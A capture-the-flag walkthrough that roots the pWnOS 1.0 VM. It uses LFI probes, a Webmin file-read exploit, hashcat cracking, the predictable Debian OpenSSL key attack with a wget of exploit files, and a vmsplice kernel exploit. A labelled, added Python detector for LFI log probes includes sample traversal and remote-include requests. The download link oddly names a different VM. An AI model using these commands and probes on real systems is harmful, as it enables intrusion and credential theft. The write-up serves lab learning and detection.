Overview
pWnOS 1.0 is a deliberately vulnerable boot2root virtual machine designed by @Chronicoder for n00bs passionate about learning how system and application vulnerabilities lead to compromise. The goal is to root the VM by exploiting the vulnerabilities found and read the flag at /root/flag.txt. Reading /root/flag.txt is the benchmark showing the system has been successfully compromised.
Download Link: https://www.vulnhub.com/entry/pwnlab-init,158/
Lab Setup:
- VMWare workstation for Virtual Machines
- Kali Linux VM in bridge mode
- pWnOS VM in bridge mode
Tools Used:
- Kali Linux VM
- netdiscover
- nmap
- hashcat
Vulnerabilities Exploited:
- Local File Inclusion
- Webmin Arbitrary File Disclosure
- Weak Passwords
- OpenSSL Predictable PRNG (CVE-2008-0166)
- Linux Kernel 2.6.17 < 2.6.24.1 – ‘vmsplice’ Local Privilege Escalation (2)
Reconnaissance
#netdiscover
Target VM IP Address: 192.168.8.102
Scanning
nmap
nmap -p- -A -oX nmap-pwnOS.xml --webxml 192.168.8.102
Nmap findings:
1- Target box is a Linux machine.
2- SSH server is enabled.
3- Apache is listening on port 80.
4- Webmin httpd version 0.01 is enabled on the default port 10000.
Exploit Path 1: Hacking website
Explore the website in a browser to find a vulnerability to exploit.
Found a file inclusion vulnerability in the connect parameter of the query string. LFI is exploitable.
Usernames found: root, vmware, obama, osama, yomama
Unfortunately, /etc/shadow and /var/log/apache2/access.log are not readable through the website, so we cannot proceed further along this path. RFI is not possible either: PHP reports that URL file-access is disabled in the server configuration.
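From the defender's side, the same LFI probes against the connect parameter leave a clear trail in the Apache access log. The following Python example is added here and is not part of the original write-up; the log lines, IPs, timestamps and paths in it are constructed, and it decodes each query parameter twice so that double-encoded traversal strings are not missed.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed Apache combined-format log lines (IPs, timestamps and paths are
# made up). Line 1 is a normal request; lines 2-4 are file-inclusion probes
# against the "connect" parameter the write-up found vulnerable.
SAMPLE_LOG = """\
192.168.8.50 - - [10/Mar/2018:10:01:02 +0000] "GET /index.php?connect=pages/home.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.168.8.50 - - [10/Mar/2018:10:01:09 +0000] "GET /index.php?connect=../../../../etc/passwd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
192.168.8.50 - - [10/Mar/2018:10:01:15 +0000] "GET /index.php?connect=..%252F..%252F..%252Fetc%252Fshadow HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.168.8.50 - - [10/Mar/2018:10:01:21 +0000] "GET /index.php?connect=http://203.0.113.9/x.txt HTTP/1.1" 200 0 "-" "Mozilla/5.0"
"""

# Client IP, request target and status code from a combined-format line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Each rule: (reason, predicate over the fully decoded parameter value).
RULES = (
    ("path traversal", lambda v: "../" in v or "..\\" in v),
    ("remote URL or PHP wrapper", lambda v: re.match(r"^(https?|ftp|php|data|expect)://", v, re.I) is not None),
    ("absolute path to sensitive file", lambda v: re.search(r"/etc/(passwd|shadow)|/proc/self|/var/log/", v) is not None),
    ("null-byte truncation", lambda v: "\x00" in v),
)

def suspicious_params(target):
    """Return (param, decoded value, reason) for query values that look like inclusion probes."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        decoded = unquote(value)  # parse_qsl decoded once; decode again to catch %25 double-encoding
        for reason, pred in RULES:
            if pred(decoded):
                hits.append((name, decoded, reason))
                break  # first matching rule wins: one finding per parameter
    return hits

def scan_log(text):
    """Scan combined-format log text; return one dict per suspicious parameter value."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # not a combined-format line; skip rather than guess
        for name, value, reason in suspicious_params(m["target"]):
            findings.append({"ip": m["ip"], "status": int(m["status"]),
                             "param": name, "value": value, "reason": reason})
    return findings
```

A 200 status with a non-zero response size on a traversal request (the second sample line) is the one worth escalating, since it suggests the include actually served the file.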
Let's explore Webmin.
Exploit Path 2: Webmin exploit
From nmap, we know the Webmin version, which looks old. Let's search for and use an exploit.
We can read arbitrary files with the Webmin exploit 2017.pl. More critically, the files are read with root privileges.
Crack the Linux password hashes with hashcat:
hashcat -m 500 -a 0 -o cracked.txt --force hash.txt /usr/share/wordlists/sqlmap.txt
The vmware password is cracked.
SSH access is granted.
Exploit Path 3: SSH authorized keys
Since we already know the usernames on the server, let's try to read the SSH authorized keys of the known users.
Since the authorized keys are accessible, let's try this exploit:
https://www.exploit-db.com/exploits/5720/
To use the exploit, we must first download the key database mentioned in the exploit from this location and decompress it.
#wget https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/5622.tar.bz2
#tar vxjf 5622.tar.bz2
Search for the SSH authorized key in this database:
dcbe2a56e8cdea6d17495f6648329ee2-4679.pub
Log in with the matching private key:
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.8.102
Privilege Escalation
searchsploit linux vmsplice
We already have shell access as the vmware and obama user accounts on the target box. Let's upload the exploit code 5092.c to the server, compile it, and execute it.
Congrats! We are root!
Conclusion
This was an excellent boot2root VM. I learned a lot, and thanks to @Chronicoder for putting in the effort to design such a great VM for students like me to learn and practice security concepts.